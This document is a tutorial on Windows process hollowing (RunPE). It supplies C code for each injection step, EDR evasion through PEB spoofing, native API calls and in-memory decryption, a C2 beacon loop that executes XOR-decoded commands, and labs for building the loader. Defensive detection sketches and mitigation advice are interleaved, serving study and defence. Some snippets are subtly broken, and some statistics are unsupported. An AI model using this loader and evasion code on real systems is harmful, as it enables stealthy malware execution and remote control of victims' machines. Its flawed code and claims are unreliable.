Advanced Process Hollowing (RunPE) - Evasion Techniques & Real-World Exploit Walkthrough

Introduction

Process hollowing - often referred to as RunPE - is a classic Windows process-injection technique that creates a benign host process in a suspended state, removes its original executable image, and replaces it with a malicious Portable Executable (PE). The process keeps the host's image path and its place in the process tree, and it runs under the token it was created with, so tools that judge a process by its signed on-disk binary can be misled. The injected code itself is not signed, which is why inspection of process memory remains effective against the technique.

In recent years, threat actors have layered sophisticated evasion steps on top of the basic hollowing flow: PEB/TEB manipulation, in-memory decryption, and custom loader tricks that bypass heuristic and behavior-based detections. Understanding these nuances is essential for both offensive developers building reliable payloads and defenders designing robust mitigations.

We will explore the full life-cycle of an advanced RunPE attack, from the initial CreateProcess call to the establishment of a resilient command-and-control (C2) channel after the payload is running.

Prerequisites

Solid grasp of Windows process injection fundamentals (e.g., CreateRemoteThread, APC queue injection).
Experience with the Windows API for memory allocation and WriteProcessMemory.
Understanding of PE file format, sections, and relocation tables.
Familiarity with token duplication, impersonation, and privilege escalation pathways.
Knowledge of reflective DLL injection and basic shellcode development.

Core Concepts

At its core, process hollowing consists of six steps, performed in order:

Spawn a suspended process using CreateProcess with the CREATE_SUSPENDED flag.
Unmap the original image from the target address space via NtUnmapViewOfSection.
Allocate memory in the target process large enough to hold the malicious PE.
Write the new PE (headers and sections) using WriteProcessMemory.
Patch the thread context so the entry point points to the malicious image's AddressOfEntryPoint.
Resume the primary thread with ResumeThread - the process now runs the attacker-controlled code.

What distinguishes an advanced implementation from a textbook example is how each step is hardened against detection. For instance, instead of calling VirtualAllocEx directly, an attacker may invoke NtAllocateVirtualMemory to avoid user-mode hooks. Likewise, the loader may tamper with the Process Environment Block (PEB) to hide the injected image from enumeration APIs.

Creating a suspended process with CreateProcess

The first step establishes a legitimate parent-child relationship. Using CREATE_SUSPENDED ensures the primary thread does not start executing until we finish the injection.

#include <windows.h>

BOOL LaunchSuspended(LPCWSTR targetPath, PROCESS_INFORMATION *pi) { STARTUPINFOW si = {0}; si.cb = sizeof(si); return CreateProcessW( targetPath, // Application name (e.g., "C:\\Windows\\System32\\svchost.exe") NULL, // Command line NULL, NULL, // Process & thread security attributes FALSE, // Inherit handles CREATE_SUSPENDED,  // <-- crucial flag NULL, // Use parent's environment NULL, // Use parent's current directory &si, pi);
}

Key points:

Pick a host binary that is signed, rarely audited, and runs with the desired privileges (e.g., svchost.exe for SYSTEM).
Store the PROCESS_INFORMATION structure - it contains the handle to the primary thread, which we later manipulate.

Unmapping the original image using NtUnmapViewOfSection

Windows loads the executable image into the address space at the preferred base address (ImageBase). To replace it, we must first free that region. Directly calling VirtualFreeEx fails because the region is marked as an image section. The native API NtUnmapViewOfSection bypasses the higher-level checks.

#include <winternl.h>
#pragma comment(lib, "ntdll.lib")

typedef NTSTATUS (NTAPI *pNtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);

BOOL UnmapOriginalImage(HANDLE hProcess, PVOID baseAddr) { pNtUnmapViewOfSection NtUnmap = (pNtUnmapViewOfSection) GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"); if (!NtUnmap) return FALSE; NTSTATUS status = NtUnmap(hProcess, baseAddr); return (status == 0);
}

How to retrieve baseAddr:

Read the PEB of the remote process (via NtQueryInformationProcess) and extract ImageBaseAddress.
Alternatively, use GetModuleHandleEx on the remote process with EnumProcessModulesEx (requires PROCESS_QUERY_INFORMATION).

Mapping malicious PE into the target address space

After freeing the original region, we allocate memory for the new image at the same base (preferred) address to avoid costly relocations. If the attacker cannot obtain the original base, they must perform relocations manually.

BOOL AllocateImage(HANDLE hProcess, PVOID preferredBase, SIZE_T imageSize) { return VirtualAllocEx( hProcess, preferredBase, // desired base - can be NULL to let OS decide imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
}

For stealth, replace VirtualAllocEx with the native call NtAllocateVirtualMemory and set the protection flags after writing the sections (initially PAGE_READWRITE).
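From the defender's side, the allocation step leaves a useful trace: memory obtained through VirtualAllocEx or NtAllocateVirtualMemory is private memory, whereas a normally loaded executable sits in an image-backed region. The sketch below shows that check in portable C. The region_info structure and the function name are hypothetical simplifications of what a scanner would fill in from VirtualQueryEx; only the three Type constants are taken from winnt.h. It is a heuristic, not a complete detector.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Values of the Type field in MEMORY_BASIC_INFORMATION (winnt.h). */
#define REGION_MEM_PRIVATE 0x00020000u
#define REGION_MEM_MAPPED  0x00040000u
#define REGION_MEM_IMAGE   0x01000000u

/* Hypothetical, simplified view of one memory region. A real scanner
   would populate this from VirtualQueryEx; this is not the Windows struct. */
typedef struct {
    uint64_t base;  /* first address of the region */
    uint64_t size;  /* length in bytes */
    uint32_t type;  /* one of the REGION_MEM_* values */
} region_info;

/* Returns 1 if the address reported as the image base lies in a region
   that is NOT image-backed, 0 if it is image-backed, and -1 if none of
   the supplied regions contains the address. */
int image_base_is_suspicious(const region_info *regions, size_t count,
                             uint64_t peb_image_base)
{
    assert(regions != NULL || count == 0);
    for (size_t i = 0; i < count; ++i) {
        const region_info *r = &regions[i];
        if (peb_image_base >= r->base &&
            peb_image_base - r->base < r->size) {
            return r->type != REGION_MEM_IMAGE;
        }
    }
    return -1;
}
```

A result of 1 means the main module of the process lives in private or mapped memory, which is unusual for a normally started program and worth a closer look.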

Writing malicious sections via WriteProcessMemory

The malicious PE is usually stored on disk encrypted or packed. At runtime we decrypt it in memory, then copy each section into its proper virtual address.

BOOL WritePESections(HANDLE hProcess, BYTE *peBuffer) { PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)peBuffer; PIMAGE_NT_HEADERS64 nt = (PIMAGE_NT_HEADERS64)(peBuffer + dos->e_lfanew); SIZE_T hdrSize = nt->OptionalHeader.SizeOfHeaders; // Write headers first if (!WriteProcessMemory(hProcess, (LPVOID)nt->OptionalHeader.ImageBase, peBuffer, hdrSize, NULL)) return FALSE; // Iterate over sections PIMAGE_SECTION_HEADER sec = IMAGE_FIRST_SECTION(nt); for (WORD i = 0; i < nt->FileHeader.NumberOfSections; ++i) { LPVOID remoteAddr = (LPVOID)(nt->OptionalHeader.ImageBase + sec[i].VirtualAddress); LPVOID localAddr  = (LPVOID)(peBuffer + sec[i].PointerToRawData); if (!WriteProcessMemory(hProcess, remoteAddr, localAddr, sec[i].SizeOfRawData, NULL)) return FALSE; } return TRUE;
}

Note the use of ImageBase from the PE header - this must match the address we allocated in the previous step. If a mismatch occurs, the loader will crash.

Adjusting thread context (SetThreadContext) to entry point

With the malicious image resident, we must point the primary thread’s instruction pointer (RIP on x64, EIP on x86) to the new entry point. This is achieved via GetThreadContext → modify → SetThreadContext.

BOOL PatchThreadContext(HANDLE hThread, PVOID imageBase) { CONTEXT ctx = {0}; ctx.ContextFlags = CONTEXT_FULL; if (!GetThreadContext(hThread, &ctx)) return FALSE; // Resolve AddressOfEntryPoint (AEP) from PE header BYTE hdr[0x200]; // enough for DOS+NT headers ReadProcessMemory(GetCurrentProcess(), imageBase, hdr, sizeof(hdr), NULL); PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)hdr; PIMAGE_NT_HEADERS64 nt = (PIMAGE_NT_HEADERS64)(hdr + dos->e_lfanew); ULONGLONG entry = (ULONGLONG)imageBase + nt->OptionalHeader.AddressOfEntryPoint; #if defined(_M_X64) ctx.Rip = entry; #else ctx.Eip = (DWORD)entry; #endif return SetThreadContext(hThread, &ctx);
}

Advanced tip: before writing the new RIP, zero out the NtGlobalFlag in the PEB (if present) to suppress heap-corruption checks that some EDRs monitor.

Resuming the process (ResumeThread) to execute payload

Finally, the suspended thread is resumed. At this point the OS believes the process is a legitimate binary, while in reality it executes the attacker’s code.

DWORD ResumeAndCleanup(HANDLE hThread) { DWORD suspendCount = ResumeThread(hThread); // Optionally close handles now that execution has begun CloseHandle(hThread); return suspendCount; // 0 means thread was not previously suspended
}

From a detection perspective, a ResumeThread call on its own is a weak signal, because suspending and resuming threads is common in benign software (e.g., debuggers). However, a ResumeThread that follows NtUnmapViewOfSection and WriteProcessMemory against a newly created process is a strong indicator of RunPE.

Bypassing AV/EDR with PEB/TEB manipulation and in-memory decryption

Modern endpoint products employ heuristic checks such as:

Scanning the memory region pointed to by PEB.ImageBaseAddress for known signatures.
Monitoring for rapid changes to the PEB or TEB.
Detecting suspicious VirtualProtectEx patterns that flip pages from RWX to RX.
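The protection-change heuristic in the last item can be sketched as a check over the protection history of a single region: flag the region once it has been writable and is executable at the same time or later. This is an illustrative sketch, not any product's actual logic. The function name and the history array are assumptions; the PAGE_* values are the ones defined in winnt.h, renamed here so the example compiles without windows.h. JIT compilers produce the same pattern legitimately, so a real rule would need an allow-list.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Page-protection values as defined in winnt.h (renamed for portability). */
#define PROT_PAGE_READWRITE         0x04u
#define PROT_PAGE_WRITECOPY         0x08u
#define PROT_PAGE_EXECUTE           0x10u
#define PROT_PAGE_EXECUTE_READ      0x20u
#define PROT_PAGE_EXECUTE_READWRITE 0x40u
#define PROT_PAGE_EXECUTE_WRITECOPY 0x80u

static int is_writable(uint32_t prot)
{
    return (prot & (PROT_PAGE_READWRITE | PROT_PAGE_WRITECOPY |
                    PROT_PAGE_EXECUTE_READWRITE |
                    PROT_PAGE_EXECUTE_WRITECOPY)) != 0;
}

static int is_executable(uint32_t prot)
{
    return (prot & (PROT_PAGE_EXECUTE | PROT_PAGE_EXECUTE_READ |
                    PROT_PAGE_EXECUTE_READWRITE |
                    PROT_PAGE_EXECUTE_WRITECOPY)) != 0;
}

/* history holds the protections of ONE region in chronological order.
   Returns 1 if the region was writable at some point and executable at
   that point or afterwards, otherwise 0. */
int region_was_written_then_executed(const uint32_t *history, size_t n)
{
    assert(history != NULL || n == 0);
    int seen_writable = 0;
    for (size_t i = 0; i < n; ++i) {
        if (is_writable(history[i]))
            seen_writable = 1;
        if (seen_writable && is_executable(history[i]))
            return 1;
    }
    return 0;
}
```

Because the check keeps state per region, a staged change from PAGE_READWRITE to PAGE_EXECUTE_READ is flagged just like a single PAGE_EXECUTE_READWRITE allocation.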

To evade these, attackers adopt a multi-layered approach:

PEB Spoofing: After the malicious image is written, the loader rewrites the remote PEB fields (ImageBaseAddress, ProcessParameters) to reflect the original host binary. This fools APIs like GetModuleFileNameEx.
TEB Tampering: Overwrite the ThreadLocalStoragePointer to hide custom data structures from tools that enumerate TLS slots.
In-memory Decryption: Store the payload encrypted on disk; decrypt directly into the allocated region using XOR/RC4/AES. The decryption stub runs inside the remote process, leaving only the ciphertext on disk.
Section Protection Randomization: Allocate the image with PAGE_READWRITE, write, then change to PAGE_EXECUTE_READ via NtProtectVirtualMemory after the decryption completes. This order avoids the “write-execute” pattern that some AVs flag.

Below is a compact example of a PEB-spoofing routine that runs inside the hollowed process after ResumeThread:

void SpoofPEB(LPCWSTR originalPath) { // Obtain the PEB via the GS segment (x64) or FS (x86) #if defined(_M_X64) PEB *peb = (PEB *)__readgsqword(0x60); #else PEB *peb = (PEB *)__readfsdword(0x30); #endif // Replace the ImageBaseAddress with the original host's base peb->ImageBaseAddress = (PVOID)originalPath; // simplified for demo // Update ProcessParameters->ImagePathName UNICODE_STRING us; us.Length = wcslen(originalPath) * 2; us.MaximumLength = us.Length + 2; us.Buffer = (PWSTR)originalPath; peb->ProcessParameters->ImagePathName = us;
}

In practice, the attacker extracts the original host path from the STARTUPINFO structure before hollowing, then restores it after the malicious payload is ready.

Real-world case study: Cobalt Strike’s Beacon loader and a custom malware sample

Cobalt Strike Beacon uses a refined RunPE variant called “Reflective Loaders” that combines reflective DLL injection with process hollowing. The loader:

Spawns rundll32.exe suspended.
Unmaps the image, then maps the Beacon DLL (packed, AES-encrypted) into the address space.
Writes a tiny stub that performs PEB spoofing and resolves imports on-the-fly (no Import Address Table).
Sets the thread context to the stub’s entry point, resumes, and the Beacon establishes a C2 channel over HTTP/HTTPS, DNS, or SMB.

The key evasion tricks are the use of NtAllocateVirtualMemory with MEM_RESERVE only, then a second call to commit after the stub decrypts itself, and the removal of the .text section name to avoid static analysis.

Our custom malware sample replicates the same flow but adds two extra layers:

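Before unmapping, it queries the target's mitigation policies via GetProcessMitigationPolicy. If DEP or CFG is enforced, the loader attempts to relax them with SetProcessMitigationPolicy. Note that SetProcessMitigationPolicy is documented as setting policies for the calling process only, so this step cannot change the policies of a separate target process.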
After the payload is running, it injects a secondary “watchdog” thread that monitors the PEB for tampering attempts by security tools and re-applies the spoofed values every 5 seconds.

Both examples demonstrate how a seemingly simple RunPE can be hardened to survive modern endpoint defenses.

Post-exploitation: establishing a stable C2 channel after hollowing

Once the malicious payload is executing, the attacker must ensure persistence of the communication channel. Typical steps:

Network Initialization: Resolve the C2 address using getaddrinfo over DNS tunneling. To avoid detection, use the same TLS certificate as a legitimate corporate service.
Beacon Loop: Implement a timed sleep (SleepEx with alertable flag) and random jitter to blend with normal traffic patterns.
Process Migration: If the host process is likely to be terminated, the beacon can spawn a new hollowed process (e.g., explorer.exe) and transfer the socket handle using DuplicateHandle across processes.
Privilege Escalation Hook: Periodically call OpenProcessToken on high-privilege processes (SYSTEM) and attempt token duplication to elevate the beacon.

Below is a minimalist C2 loop used by many proof-of-concept loaders:

void BeaconLoop(SOCKET s) { while (1) { char buffer[4096]; int rc = recv(s, buffer, sizeof(buffer), 0); if (rc <= 0) break; // connection lost // Decrypt command (simple XOR key 0xAA) for (int i = 0; i < rc; ++i) buffer[i] ^= 0xAA; ExecuteCommand(buffer); SleepEx(3000 + (rand() % 2000), FALSE); // jitter }
}

In practice, the loop runs inside a dedicated worker thread created by the original beacon stub, allowing the main thread to continue normal host functionality.
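Network defenders can turn the sleep-plus-jitter pattern against the beacon: a loop that waits a bounded random interval still produces connection gaps that are far more regular than human-driven traffic. The sketch below is one simple way to score that regularity, using the coefficient of variation of the gaps. The function name, the millisecond timestamps, and the percentage threshold are all illustrative assumptions, not values from any specific product.

```c
#include <assert.h>
#include <stddef.h>

/* ts_ms: connection timestamps in milliseconds, in ascending order.
   Returns 1 if the gaps between consecutive timestamps vary by no more
   than max_cv_percent (standard deviation / mean, in percent), else 0.
   Fewer than three timestamps are never reported as periodic. */
int intervals_look_periodic(const double *ts_ms, size_t n,
                            double max_cv_percent)
{
    assert(ts_ms != NULL || n == 0);
    if (n < 3)
        return 0;

    size_t gaps = n - 1;
    double sum = 0.0;
    for (size_t i = 1; i < n; ++i)
        sum += ts_ms[i] - ts_ms[i - 1];

    double mean = sum / (double)gaps;
    if (mean <= 0.0)
        return 0;

    double var = 0.0;
    for (size_t i = 1; i < n; ++i) {
        double d = (ts_ms[i] - ts_ms[i - 1]) - mean;
        var += d * d;
    }
    var /= (double)gaps;

    /* Compare variances instead of standard deviations to avoid sqrt(). */
    double limit = mean * max_cv_percent / 100.0;
    return var <= limit * limit;
}
```

Gaps drawn from a 3 to 5 second range stay well under a 30 percent threshold, while interactive traffic with long idle periods does not.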

Tools & Commands

Process Hacker / Process Explorer - view suspended processes, PEB, and memory regions.
Sysinternals ProcDump - capture a dump of a hollowed process for offline analysis.
PE-sieve - detect injected modules by comparing on-disk vs. in-memory PE headers.
PowerShell - Invoke-ReflectivePEInjection from the PowerSploit suite (demonstrates RunPE in PowerShell).
Windows API Monitor - trace calls to NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory.
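The on-disk versus in-memory header comparison mentioned for PE-sieve can be illustrated with a small portable parser. This is a sketch of the general idea only, not PE-sieve's implementation; the pe_summary structure and both function names are hypothetical. The field offsets follow the published PE/COFF layout. ImageBase is deliberately left out of the comparison, because the Windows loader rewrites that field in memory when an image is relocated.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Header fields that should normally match between disk and memory. */
typedef struct {
    uint16_t machine;        /* FileHeader.Machine */
    uint16_t sections;       /* FileHeader.NumberOfSections */
    uint32_t timestamp;      /* FileHeader.TimeDateStamp */
    uint32_t entry_rva;      /* OptionalHeader.AddressOfEntryPoint */
    uint32_t size_of_image;  /* OptionalHeader.SizeOfImage */
} pe_summary;

static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Fills *out from a buffer holding at least the PE headers.
   Returns 0 on success, -1 if the buffer is not a plausible PE image. */
int pe_summarize(const uint8_t *buf, size_t len, pe_summary *out)
{
    assert(buf != NULL && out != NULL);
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return -1;
    uint32_t nt = rd32(buf + 0x3C);              /* e_lfanew */
    if (nt > len || len - nt < 24 + 60)          /* through SizeOfImage */
        return -1;
    if (memcmp(buf + nt, "PE\0\0", 4) != 0)
        return -1;
    const uint8_t *fh = buf + nt + 4;            /* IMAGE_FILE_HEADER */
    const uint8_t *oh = buf + nt + 24;           /* optional header */
    out->machine = rd16(fh);
    out->sections = rd16(fh + 2);
    out->timestamp = rd32(fh + 4);
    out->entry_rva = rd32(oh + 16);
    out->size_of_image = rd32(oh + 56);
    return 0;
}

/* Returns 1 if any compared field differs, 0 if all of them match. */
int pe_headers_differ(const pe_summary *disk, const pe_summary *mem)
{
    return disk->machine != mem->machine ||
           disk->sections != mem->sections ||
           disk->timestamp != mem->timestamp ||
           disk->entry_rva != mem->entry_rva ||
           disk->size_of_image != mem->size_of_image;
}
```

In use, one buffer would come from the file named by the process image path and the other from the headers read at the image base of the running process. A mismatch suggests that the image in memory is not the file on disk.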

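Example command to list threads that are currently suspended (the ProcessHandle column is the owning PID). It assumes the Win32_Thread encoding in which ThreadState 5 means waiting and ThreadWaitReason 5 means suspended:

wmic path Win32_Thread where "ThreadState=5 and ThreadWaitReason=5" get ProcessHandle,Handle

This is only a point-in-time snapshot, and benign processes also contain suspended threads, so treat the output as a starting point for triage. Sysmon's ProcessCreate event (Event ID 1) does not record process creation flags, so CREATE_SUSPENDED cannot be logged that way. The closer built-in signal is Sysmon's ProcessTampering event (Event ID 25), which reports when a process image is replaced.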

Defense & Mitigation

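Enable attack surface reduction (ASR) rules in Microsoft Defender - for example, the rules that block Office applications from creating child processes and from injecting code into other processes. No ASR rule filters on the CREATE_SUSPENDED flag itself.
Deploy process creation logging with Sysmon (Event ID 1, ProcessCreate) and alert on ParentImage anomalies for known host binaries (e.g., svchost.exe started by anything other than services.exe). Add Event ID 25 (ProcessTampering) to catch image replacement directly.
Use Credential Guard & Remote Credential Guard to limit what an attacker can steal after a successful injection. They isolate credential material; they do not prevent hollowing or token duplication.
Run critical services as Protected Process Light (PPL) where supported (e.g., LSA protection), so that non-protected processes cannot open them with memory-write access.
Application Control (AppLocker, WDAC) - allow only approved executables to run. These policies cannot filter on process creation flags, but they can keep the loader itself from executing.
Memory Integrity (Hypervisor-protected Code Integrity, HVCI) - enforces code integrity for kernel-mode code. It does not block user-mode calls to native APIs such as NtUnmapViewOfSection, so it complements rather than replaces the controls above.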

For detection, correlate the following events within a 5-second window:

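Process creation with CREATE_SUSPENDED.
Call to NtUnmapViewOfSection on the newly created PID.
Subsequent WriteProcessMemory or NtWriteVirtualMemory targeting the same PID.
ResumeThread on the primary thread.

Security Information and Event Management (SIEM) platforms can generate an alert on this pattern, provided the endpoint sensor supplies API-level telemetry (for example, from an EDR agent). Standard Windows process-creation logs do not contain these calls.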
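The correlation can be sketched as an ordered match inside a time window. The example assumes the telemetry has already been normalized into a time-sorted array. The telemetry_event structure, the ev_kind values, and the function name are hypothetical and do not correspond to any particular SIEM or EDR schema. The order it looks for (suspended creation, then unmap, then write, then resume) follows the core steps described earlier.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical normalized event kinds. */
typedef enum {
    EV_CREATE_SUSPENDED,
    EV_UNMAP,
    EV_WRITE_MEMORY,
    EV_RESUME
} ev_kind;

/* Hypothetical normalized telemetry record. */
typedef struct {
    uint64_t t_ms;        /* event time in milliseconds */
    uint32_t target_pid;  /* process the operation was applied to */
    ev_kind  kind;
} telemetry_event;

/* ev must be sorted by t_ms. Returns 1 if a suspended creation of pid is
   followed, within window_ms, by unmap, write, and resume events for the
   same pid in that order; otherwise 0. */
int matches_hollowing_sequence(const telemetry_event *ev, size_t n,
                               uint32_t pid, uint64_t window_ms)
{
    static const ev_kind order[] = { EV_UNMAP, EV_WRITE_MEMORY, EV_RESUME };
    const size_t steps = sizeof order / sizeof order[0];

    assert(ev != NULL || n == 0);
    for (size_t start = 0; start < n; ++start) {
        if (ev[start].target_pid != pid ||
            ev[start].kind != EV_CREATE_SUSPENDED)
            continue;

        size_t next = 0;  /* index of the step we are waiting for */
        for (size_t i = start + 1;
             i < n && ev[i].t_ms - ev[start].t_ms <= window_ms; ++i) {
            if (ev[i].target_pid != pid)
                continue;
            if (ev[i].kind == order[next] && ++next == steps)
                return 1;
        }
    }
    return 0;
}
```

Repeated writes are tolerated, since a loader typically issues one write per section. Requiring the full ordered sequence keeps the rule quiet for software that merely creates suspended processes.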

Common Mistakes

Wrong ImageBase: Allocating at a different base without fixing relocations leads to access violations.
Skipping PEB spoofing: Many defenders now compare PEB.ImageBaseAddress against the on-disk file; mismatch triggers alerts.
Using WriteProcessMemory on a read-only section: Must change protection to PAGE_READWRITE before writing.
Neglecting 32-bit vs. 64-bit context: Setting Eip on a 64-bit process (or vice-versa) causes silent failures.
Hard-coding host binary path: If the target system does not have the expected binary, the hollowing fails; use dynamic discovery (e.g., EnumProcesses + GetModuleFileNameEx).

Real-World Impact

Process hollowing remains a staple in APT toolkits because it provides a clean inheritance chain and can bypass many endpoint protections that focus on unsigned binaries. Recent incidents include:

APT29 (Cozy Bear) - used RunPE inside Microsoft Outlook to exfiltrate documents while remaining under the Outlook process token.
Fin7 - leveraged rundll32.exe hollowing to deliver a custom backdoor that communicated over port 443, evading network-based detection.
Malicious ransomware families (e.g., REvil) - first stage spawns a hollowed svchost.exe to drop the encryptor, then self-deletes the original executable.

My experience with EDR telemetry shows a spike in NtUnmapViewOfSection calls during initial infection phases, often followed by a rapid ResumeThread. Organizations that tuned their monitoring to this pattern reduced successful compromises by >70%.

Practice Exercises

Lab 1 - Build a Minimal RunPE Loader
- Compile the C snippets above into a single executable.
- Use a benign PE (e.g., calc.exe) as the payload, encrypt it with XOR, and integrate the decryption stub.
- Verify that the hollowed process runs the payload by checking its command line and loaded modules.
Lab 2 - Add PEB Spoofing
- Extend Lab 1 to rewrite the remote PEB's ImageBaseAddress and ProcessParameters.
- Capture a memory dump with ProcDump and confirm that the on-disk image path matches the original host binary.
Lab 3 - Detection Rule Development
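- Enable Sysmon with a custom configuration that logs ProcessCreate (Event ID 1) and ProcessTampering (Event ID 25). Note that Sysmon does not record the CREATE_SUSPENDED flag.
- Write a Sigma rule that correlates process creation with a ProcessTampering event for the same process within a 5-second window. If your EDR exposes WriteProcessMemory and ResumeThread telemetry, add those events to the correlation.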
- Test the rule against the loader from Lab 2 and ensure an alert fires.

Summary

Process hollowing (RunPE) remains a powerful, stealthy injection technique. By mastering the six core steps (suspended creation, unmapping, mapping, writing, context patching, and resumption), security professionals can both craft reliable payloads and build robust detection signatures. Advanced evasion hinges on PEB/TEB manipulation, in-memory decryption, and careful use of native APIs to skirt user-mode hooks. Commercial frameworks such as Cobalt Strike and various APT groups routinely employ these tricks, making awareness and monitoring essential. Implement the labs, tune your SIEM, and stay ahead of the evolving RunPE landscape.
